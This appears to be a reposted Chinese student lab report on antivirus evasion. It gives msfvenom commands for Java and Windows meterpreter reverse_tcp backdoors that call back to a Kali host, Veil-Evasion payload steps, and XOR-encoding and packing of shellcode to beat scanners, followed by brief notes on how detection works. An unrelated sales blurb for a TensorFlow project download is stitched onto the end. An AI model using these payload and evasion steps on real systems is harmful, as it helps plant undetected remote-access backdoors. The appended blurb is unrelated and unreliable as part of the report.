20155220 网络攻防技术 实验三 免杀原理与实践

网络攻防技术 实验三 免杀原理与实践

使用msf生成后门程序的检测

  • 首先我们对上次实验生成的后门exe,利用VirSCAN进行检测

1072272-20180410213221231-1849325156.png

1072272-20180410213239741-690578332.png

  • 然后我们利用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.150.138(kali ip) lport=5220 x> 5220_backjar.jar
    生成jar文件,进行检测。

1072272-20180410213426609-248274821.png

1072272-20180410213440217-1278132303.png

1072272-20180410213501069-943046790.png

使用veil-evasion生成反弹链接的可执行文件

  • 首先我们先对veil-evasion进行安装,详情可参考老师博客

  • 安装好之后,我们利用veil,指令打开veil-evasion

  • 依次用use evasionlist payloads,进入到payloads模板界面

  • 随便选择一个模板,将其复制,然后输入use 5(你所复制的模板)

  • 然后输入set LHOST kali-ipset LPORT 5220对其进行配置,然后输入generate,生成。

1072272-20180410214019331-2053802572.png

1072272-20180410214240812-1264902432.png

利用shellcode编程实现免杀

  • 首先我们输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.138 LPORT=443 -f c

  • 根据老师所给的,将其变成C语言文件,进行编译
  • 进行回连,回连成功

1072272-20180410214607166-654146099.png

1072272-20180410214621389-1485509865.png

对shellcode进行更改

  • 我首先对其进行异或,我做的为异或0x83

1072272-20180410215009048-644662916.png

  • 回连成功
    1072272-20180410215255504-720606460.png
    1072272-20180410215310384-1648476377.png

  • 进行检测,如图

1072272-20180410215336429-681720355.png

加壳

1072272-20180411144304555-2121204642.png

1072272-20180411144320735-1114292165.png

加壳后我发现了加壳后的病毒文件较之前未加壳更容易被查杀,但我发现了其中有的杀毒软件在病毒文件加壳后反而未能识别出来,而加壳后有些新的杀毒软件反而能够识别了,这我就不知所因了。

基础问题

  • 1.杀软是如何检测出恶意代码的?

    • 基于特征码的检测:杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据已检测出或网络上公布的病毒,对其提取特征码,记录成病毒库,检测到程序时将程序与特征码比对即可判断是否是恶意代码。

    • .基于行为的恶意软件检测:在程序运行的状态下(动态)对其行为进行监控,如果有敏感行为会被认为是恶意程序,是一种动态的监测与捕捉。

  • 2.免杀是做什么?

    • 免杀是将二进制码隐藏,或者变形
  • 3.免杀的基本方法有哪些?

    • 改变特征码

    • 对exe可执行文件加壳:压缩壳 加密壳

    • 基于payload重新编译生成可执行文件

      实践总结与体会

      本次实验过程颇为曲折,首先在下载veil过程中无法安装,再三尝试后只得拷了一个虚拟机;
      然后对shellcode代码更改后,回连出现了失败,在组长的指导下顺利解决了该问题。
      通过本次实验,突然发现稍稍修改病毒就可以骗过好多杀毒软件,让我对现在电脑的安全性有了重新的审视;
      最后我还是赶紧去给电脑杀毒了。

转载于:https://www.cnblogs.com/20155220wsq/p/8783368.html

利用 TensorFlow 训练自己的目标识别器。本文内容来自于我的毕业设计,基于 TensorFlow 1.15.0,其他 TensorFlow 版本运行可能存在问题。.zip项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值